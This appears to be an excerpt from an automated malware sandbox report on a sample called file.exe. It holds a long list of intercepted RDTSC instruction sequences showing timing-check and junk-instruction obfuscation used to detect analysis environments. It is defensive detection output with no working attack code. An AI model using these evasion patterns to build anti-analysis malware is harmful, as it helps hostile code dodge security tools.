              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF25BF second address: AF25C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6FA4A second address: A6FA4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6FA4F second address: A6FA55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6FA55 second address: A6FA59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFE3DE second address: AFE402 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jl 00007FB10CD320F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FB10CD320FEh 0x00000014 jo 00007FB10CD320F6h 0x0000001a popad 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B008BC second address: B008C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B008C2 second address: B008C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82288 second address: A8228E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B00488 second address: B004B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB10CD320F6h 0x0000000a jmp 00007FB10CD32107h 0x0000000f popad 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 jnp 00007FB10CD320F6h 0x0000001a pop edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B004B5 second address: B004BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B03747 second address: B0374B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B031DD second address: B031E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B09FD2 second address: B09FF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB10CD320FFh 0x0000000e jc 00007FB10CD320F6h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B09FF0 second address: B09FF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B09FF4 second address: B09FFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B09FFE second address: B0A002 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B08999 second address: B0899E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0899E second address: B089A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B08B05 second address: B08B09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A715D1 second address: A715D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABFFD8 second address: ABFFDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC0067 second address: AC0071 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB10CBE4286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0933B second address: B0933F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0EC86 second address: B0EC8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1135B second address: B11361 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B11361 second address: B11377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB10CBE428Ah 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B11377 second address: B1137E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B115F7 second address: B115FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B115FB second address: B11611 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB10CD320FCh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B173D1 second address: B173F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB10CBE428Bh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007FB10CBE428Ch 0x00000011 js 00007FB10CBE4286h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B173F4 second address: B173FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B173FA second address: B1741A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jno 00007FB10CBE429Bh 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B17596 second address: B1759A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B17CAC second address: B17CB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B18A68 second address: B18A6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B18D54 second address: B18D68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FB10CBE4286h 0x0000000e jl 00007FB10CBE4286h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B18D68 second address: B18D6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1DF74 second address: B1DF8B instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB10CBE428Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1DF8B second address: B1DF99 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB10CD320F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1CFC9 second address: B1CFCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D197 second address: B1D1A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D2D4 second address: B1D30F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB10CBE428Ch 0x0000000a popad 0x0000000b jnc 00007FB10CBE42B3h 0x00000011 je 00007FB10CBE4288h 0x00000017 push edx 0x00000018 pop edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FB10CBE4299h 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D30F second address: B1D313 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D461 second address: B1D46A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D46A second address: B1D474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FB10CD320F6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D474 second address: B1D47C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D47C second address: B1D481 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D481 second address: B1D487 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D787 second address: B1D7A8 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB10CD320F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b jo 00007FB10CD320F6h 0x00000011 jbe 00007FB10CD320F6h 0x00000017 pop ecx 0x00000018 pop ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f push edi 0x00000020 pop edi 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D7A8 second address: B1D7AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D7AE second address: B1D7CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FB10CD32103h 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D7CB second address: B1D7D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D7D3 second address: B1D7D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D7D7 second address: B1D7DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D93D second address: B1D943 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D943 second address: B1D95B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB10CBE4293h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D95B second address: B1D977 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB10CD32108h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1DB99 second address: B1DBBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007FB10CBE4296h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6AA1E second address: A6AA68 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jno 00007FB10CD320F6h 0x00000009 jg 00007FB10CD320F6h 0x0000000f pop edx 0x00000010 jmp 00007FB10CD32103h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jnp 00007FB10CD320FEh 0x0000001f pushad 0x00000020 popad 0x00000021 jl 00007FB10CD320F6h 0x00000027 jmp 00007FB10CD32105h 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6AA68 second address: A6AA85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB10CBE4299h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2AA2C second address: B2AA32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2AB95 second address: B2ABB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FB10CBE4292h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2ABB0 second address: B2ABB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B2ABB6 second address: B2ABC9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 js 00007FB10CBE4286h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push edi 0x0000000e push ecx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B2ACF8 second address: B2AD00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B2B014 second address: B2B020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FB10CBE4286h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B2B020 second address: B2B037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FB10CD320FEh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B2B037 second address: B2B053 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB10CBE4292h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B2B053 second address: B2B057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B2B057 second address: B2B05B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B29DAC second address: B29DD0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jne 00007FB10CD320F6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop esi 0x0000000c push esi 0x0000000d jmp 00007FB10CD320FFh 0x00000012 pop esi 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B29DD0 second address: B29DE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB10CBE428Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B33380 second address: B33388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B33388 second address: B333B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FB10CBE4286h 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007FB10CBE428Fh 0x00000012 ja 00007FB10CBE4288h 0x00000018 jng 00007FB10CBE4292h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B333B4 second address: B333BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B32DDE second address: B32DE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B3306B second address: B3309A instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB10CD320FEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d jmp 00007FB10CD320FDh 0x00000012 pop ecx 0x00000013 ja 00007FB10CD320FCh 0x00000019 jg 00007FB10CD320F6h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B3309A second address: B330AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FB10CBE4286h 0x0000000a jns 00007FB10CBE4286h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B3E5C0 second address: B3E5C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B3E5C6 second address: B3E5CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B3E17A second address: B3E180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B3E180 second address: B3E184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B3E184 second address: B3E1AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB10CD320FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB10CD32106h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B43E7B second address: B43E81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B43E81 second address: B43E92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007FB10CD320F6h 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B4E0F1 second address: B4E126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FB10CBE4286h 0x0000000a jmp 00007FB10CBE428Bh 0x0000000f popad 0x00000010 pop edx 0x00000011 jbe 00007FB10CBE42AFh 0x00000017 jmp 00007FB10CBE4294h 0x0000001c push eax 0x0000001d push edx 0x0000001e push edx 0x0000001f pop edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B4DF85 second address: B4DF9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB10CD32100h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B513A8 second address: B513AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B513AE second address: B513B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B513B2 second address: B513BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B513BA second address: B513BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B5585A second address: B5586F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007FB10CBE4286h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jo 00007FB10CBE4286h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B58797 second address: B587CF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 jnp 00007FB10CD320F6h 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FB10CD320FDh 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jng 00007FB10CD32107h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B587CF second address: B587D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B587D5 second address: B587E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB10CD320FBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B587E4 second address: B587F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FB10CBE4286h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B5B442 second address: B5B448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B5B448 second address: B5B457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 ja 00007FB10CBE4286h 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B5D5E2 second address: B5D5E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B664C8 second address: B6650A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007FB10CBE428Ah 0x0000000a pop ebx 0x0000000b pushad 0x0000000c jmp 00007FB10CBE428Ah 0x00000011 jmp 00007FB10CBE428Ch 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push ecx 0x0000001e jl 00007FB10CBE4286h 0x00000024 pushad 0x00000025 popad 0x00000026 pop ecx 0x00000027 jbe 00007FB10CBE428Ah 0x0000002d push eax 0x0000002e pop eax 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B64BCE second address: B64BD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
